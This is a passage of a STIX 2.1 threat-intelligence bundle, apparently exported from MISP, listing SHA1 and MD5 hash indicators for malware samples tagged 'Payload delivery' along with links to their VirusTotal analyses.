"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80a2-b550-4f47-9a39-4df902de0b81",
|
|
"value": "https://www.virustotal.com/file/5584a83d69a01b2a3402c21f78284f6de8ac0a7e5dd5b25b6b9b59eb95f4eeaf/analysis/1475128000/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80a4-e45c-4cc7-894a-4ee902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:44.000Z",
|
|
"modified": "2017-03-29T09:38:44.000Z",
|
|
"description": "sample - Xchecked via VT: f842607898e226fb480979112b0d67e3266ed7abf55f854851db0686ef5e4987",
|
|
"pattern": "[file:hashes.SHA1 = '60da150d044f10e8d701039d5e22b2673d7ed926']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80a5-26d4-4568-89c1-420c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:45.000Z",
|
|
"modified": "2017-03-29T09:38:45.000Z",
|
|
"description": "sample - Xchecked via VT: f842607898e226fb480979112b0d67e3266ed7abf55f854851db0686ef5e4987",
|
|
"pattern": "[file:hashes.MD5 = 'b40705a83ddb50cc52a9027ece164ec3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80a6-40e0-4f30-a185-4fdb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:46.000Z",
|
|
"modified": "2017-03-29T09:38:46.000Z",
|
|
"first_observed": "2017-03-29T09:38:46Z",
|
|
"last_observed": "2017-03-29T09:38:46Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80a6-40e0-4f30-a185-4fdb02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80a6-40e0-4f30-a185-4fdb02de0b81",
|
|
"value": "https://www.virustotal.com/file/f842607898e226fb480979112b0d67e3266ed7abf55f854851db0686ef5e4987/analysis/1473429292/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80a8-9450-435b-a723-438702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:48.000Z",
|
|
"modified": "2017-03-29T09:38:48.000Z",
|
|
"description": "sample - Xchecked via VT: a797aff0ed250f1fffbc6a718796b63907a94ac21d6bb712a5e7786670a9d1fe",
|
|
"pattern": "[file:hashes.SHA1 = 'bae0283ba2fcf366622329c4a883fcd542afb536']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80a9-31b8-4f39-b6c1-4ac602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:48.000Z",
|
|
"modified": "2017-03-29T09:38:48.000Z",
|
|
"description": "sample - Xchecked via VT: a797aff0ed250f1fffbc6a718796b63907a94ac21d6bb712a5e7786670a9d1fe",
|
|
"pattern": "[file:hashes.MD5 = 'fe47a1b19dc24a8fb9f367f0713873fb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80aa-bf58-4ca1-9815-41e102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:50.000Z",
|
|
"modified": "2017-03-29T09:38:50.000Z",
|
|
"first_observed": "2017-03-29T09:38:50Z",
|
|
"last_observed": "2017-03-29T09:38:50Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80aa-bf58-4ca1-9815-41e102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80aa-bf58-4ca1-9815-41e102de0b81",
|
|
"value": "https://www.virustotal.com/file/a797aff0ed250f1fffbc6a718796b63907a94ac21d6bb712a5e7786670a9d1fe/analysis/1487054534/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80aa-16e4-47f7-8459-40ff02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:50.000Z",
|
|
"modified": "2017-03-29T09:38:50.000Z",
|
|
"description": "sample - Xchecked via VT: 1773b425ac6c670cabfdfa300c0b0c2724bd0585b87218c3119af39c170d3074",
|
|
"pattern": "[file:hashes.SHA1 = 'c2f785b65aaf7dfbe118d568caed5e925a34d510']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80ab-8ab0-416c-aa8b-4c1502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:51.000Z",
|
|
"modified": "2017-03-29T09:38:51.000Z",
|
|
"description": "sample - Xchecked via VT: 1773b425ac6c670cabfdfa300c0b0c2724bd0585b87218c3119af39c170d3074",
|
|
"pattern": "[file:hashes.MD5 = 'da276ddf891773c6bc1c0d8ced826c26']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80ad-5bb4-4621-b1f1-4c0302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:53.000Z",
|
|
"modified": "2017-03-29T09:38:53.000Z",
|
|
"first_observed": "2017-03-29T09:38:53Z",
|
|
"last_observed": "2017-03-29T09:38:53Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80ad-5bb4-4621-b1f1-4c0302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80ad-5bb4-4621-b1f1-4c0302de0b81",
|
|
"value": "https://www.virustotal.com/file/1773b425ac6c670cabfdfa300c0b0c2724bd0585b87218c3119af39c170d3074/analysis/1429392130/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80ae-b0a4-4875-ba48-454802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:53.000Z",
|
|
"modified": "2017-03-29T09:38:53.000Z",
|
|
"description": "sample - Xchecked via VT: d95990b7b03d017a64b8aa9f6133416176902d4195af9917660088245f4ebe7a",
|
|
"pattern": "[file:hashes.SHA1 = '3843d6ff2763aa8c13e970966fe8bd9f959e12cd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80af-3fac-4b9e-b4c4-498a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:55.000Z",
|
|
"modified": "2017-03-29T09:38:55.000Z",
|
|
"description": "sample - Xchecked via VT: d95990b7b03d017a64b8aa9f6133416176902d4195af9917660088245f4ebe7a",
|
|
"pattern": "[file:hashes.MD5 = 'beab3b091f42bc1ea4d369ae18478330']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:55Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80b0-7028-434e-b0b6-431c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:56.000Z",
|
|
"modified": "2017-03-29T09:38:56.000Z",
|
|
"first_observed": "2017-03-29T09:38:56Z",
|
|
"last_observed": "2017-03-29T09:38:56Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80b0-7028-434e-b0b6-431c02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80b0-7028-434e-b0b6-431c02de0b81",
|
|
"value": "https://www.virustotal.com/file/d95990b7b03d017a64b8aa9f6133416176902d4195af9917660088245f4ebe7a/analysis/1433772596/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80b1-c4fc-4133-bbd3-42bc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:57.000Z",
|
|
"modified": "2017-03-29T09:38:57.000Z",
|
|
"description": "sample - Xchecked via VT: 2829d72b813345348681d402184d53ec74fa491a0f3c726aae6c39b901fac1e9",
|
|
"pattern": "[file:hashes.SHA1 = '4f5cd966e660bbabbaf39490c5f4bf14ecd47172']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80b2-03cc-46dd-ab47-4ab702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:58.000Z",
|
|
"modified": "2017-03-29T09:38:58.000Z",
|
|
"description": "sample - Xchecked via VT: 2829d72b813345348681d402184d53ec74fa491a0f3c726aae6c39b901fac1e9",
|
|
"pattern": "[file:hashes.MD5 = '16678e4672b41f917e728520538bb956']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80b3-3b80-4c74-8b9f-489102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:59.000Z",
|
|
"modified": "2017-03-29T09:38:59.000Z",
|
|
"first_observed": "2017-03-29T09:38:59Z",
|
|
"last_observed": "2017-03-29T09:38:59Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80b3-3b80-4c74-8b9f-489102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80b3-3b80-4c74-8b9f-489102de0b81",
|
|
"value": "https://www.virustotal.com/file/2829d72b813345348681d402184d53ec74fa491a0f3c726aae6c39b901fac1e9/analysis/1433424815/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80b3-27dc-4077-a41c-4b6502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:59.000Z",
|
|
"modified": "2017-03-29T09:38:59.000Z",
|
|
"description": "sample - Xchecked via VT: 9bb12887255696617d3e6356fe9f343473f6805db7dfabc6585a2ecd3289bff7",
|
|
"pattern": "[file:hashes.SHA1 = '0836522fb00de1b7a28fe8bdf31ff22e0ec49b60']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:59Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80b4-27c8-418a-be33-406602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:00.000Z",
|
|
"modified": "2017-03-29T09:39:00.000Z",
|
|
"description": "sample - Xchecked via VT: 9bb12887255696617d3e6356fe9f343473f6805db7dfabc6585a2ecd3289bff7",
|
|
"pattern": "[file:hashes.MD5 = '6e2e349ec5da1daf00bc4bc718a59b26']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:00Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80b5-1218-4e0b-b229-483702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:01.000Z",
|
|
"modified": "2017-03-29T09:39:01.000Z",
|
|
"first_observed": "2017-03-29T09:39:01Z",
|
|
"last_observed": "2017-03-29T09:39:01Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80b5-1218-4e0b-b229-483702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80b5-1218-4e0b-b229-483702de0b81",
|
|
"value": "https://www.virustotal.com/file/9bb12887255696617d3e6356fe9f343473f6805db7dfabc6585a2ecd3289bff7/analysis/1433519679/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80b6-f030-4331-9f6e-46ab02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:02.000Z",
|
|
"modified": "2017-03-29T09:39:02.000Z",
|
|
"description": "sample - Xchecked via VT: 3c0f463ac70d2f2415fbdb0446ba0fad290fd93b3db9708ffc4a4bdca0b5d4f7",
|
|
"pattern": "[file:hashes.SHA1 = '52399c59b0cba82dbf796d789fb5eae6b68eaf24']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80b7-c840-4c91-92ed-46ed02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:03.000Z",
|
|
"modified": "2017-03-29T09:39:03.000Z",
|
|
"description": "sample - Xchecked via VT: 3c0f463ac70d2f2415fbdb0446ba0fad290fd93b3db9708ffc4a4bdca0b5d4f7",
|
|
"pattern": "[file:hashes.MD5 = 'cafa451daf92b3ce7bb959f3fb39e233']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:03Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80b8-0140-4a75-8ee1-4db202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:04.000Z",
|
|
"modified": "2017-03-29T09:39:04.000Z",
|
|
"first_observed": "2017-03-29T09:39:04Z",
|
|
"last_observed": "2017-03-29T09:39:04Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80b8-0140-4a75-8ee1-4db202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80b8-0140-4a75-8ee1-4db202de0b81",
|
|
"value": "https://www.virustotal.com/file/3c0f463ac70d2f2415fbdb0446ba0fad290fd93b3db9708ffc4a4bdca0b5d4f7/analysis/1433898382/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80b9-5b88-4713-b2c1-489d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:05.000Z",
|
|
"modified": "2017-03-29T09:39:05.000Z",
|
|
"description": "sample - Xchecked via VT: 60c2d4a1a5f757f5c9d3686bf85a5529e040049723ca3988e1f9560ea93a386d",
|
|
"pattern": "[file:hashes.SHA1 = '8c4e6d4589b6efae973f3d1b310419eff1551502']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80ba-37e4-421c-af6f-46aa02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:06.000Z",
|
|
"modified": "2017-03-29T09:39:06.000Z",
|
|
"description": "sample - Xchecked via VT: 60c2d4a1a5f757f5c9d3686bf85a5529e040049723ca3988e1f9560ea93a386d",
|
|
"pattern": "[file:hashes.MD5 = '3c0b0a5eb5b7c6f5ed339fb5b6dc2eb9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:06Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80bb-d670-4bee-9c33-465302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:07.000Z",
|
|
"modified": "2017-03-29T09:39:07.000Z",
|
|
"first_observed": "2017-03-29T09:39:07Z",
|
|
"last_observed": "2017-03-29T09:39:07Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80bb-d670-4bee-9c33-465302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80bb-d670-4bee-9c33-465302de0b81",
|
|
"value": "https://www.virustotal.com/file/60c2d4a1a5f757f5c9d3686bf85a5529e040049723ca3988e1f9560ea93a386d/analysis/1434395991/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80bc-33b4-4489-b5c0-45d802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:08.000Z",
|
|
"modified": "2017-03-29T09:39:08.000Z",
|
|
"description": "sample - Xchecked via VT: de77795f1344857af0b583e38939f1cbf789b0989b6c8dca4e8ea3a6f0e646a1",
|
|
"pattern": "[file:hashes.SHA1 = 'f2bfb8ceb4424ba508be417ff498b32c5fb057b2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80bc-73f4-4944-ad5a-408302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:08.000Z",
|
|
"modified": "2017-03-29T09:39:08.000Z",
|
|
"description": "sample - Xchecked via VT: de77795f1344857af0b583e38939f1cbf789b0989b6c8dca4e8ea3a6f0e646a1",
|
|
"pattern": "[file:hashes.MD5 = '4e61cb58832c24e990c0625646dceeb7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80bd-6b84-44cb-9481-40bf02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:09.000Z",
|
|
"modified": "2017-03-29T09:39:09.000Z",
|
|
"first_observed": "2017-03-29T09:39:09Z",
|
|
"last_observed": "2017-03-29T09:39:09Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80bd-6b84-44cb-9481-40bf02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80bd-6b84-44cb-9481-40bf02de0b81",
|
|
"value": "https://www.virustotal.com/file/de77795f1344857af0b583e38939f1cbf789b0989b6c8dca4e8ea3a6f0e646a1/analysis/1487245415/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80be-06f8-4c76-8fe9-454902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:10.000Z",
|
|
"modified": "2017-03-29T09:39:10.000Z",
|
|
"description": "sample - Xchecked via VT: f22ed39d51c61cae0e03b2be39e05d1bfef05e55320aace141332a4a8ed3bd2c",
|
|
"pattern": "[file:hashes.SHA1 = 'fe68096731f5bf67da47bb44188dbc480861ee80']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80bf-6c88-4b65-baba-412b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:11.000Z",
|
|
"modified": "2017-03-29T09:39:11.000Z",
|
|
"description": "sample - Xchecked via VT: f22ed39d51c61cae0e03b2be39e05d1bfef05e55320aace141332a4a8ed3bd2c",
|
|
"pattern": "[file:hashes.MD5 = 'ed70cd54713678f0ea652315421f861c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80c0-129c-49c9-af8a-44aa02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:12.000Z",
|
|
"modified": "2017-03-29T09:39:12.000Z",
|
|
"first_observed": "2017-03-29T09:39:12Z",
|
|
"last_observed": "2017-03-29T09:39:12Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80c0-129c-49c9-af8a-44aa02de0b81"
|
|
],
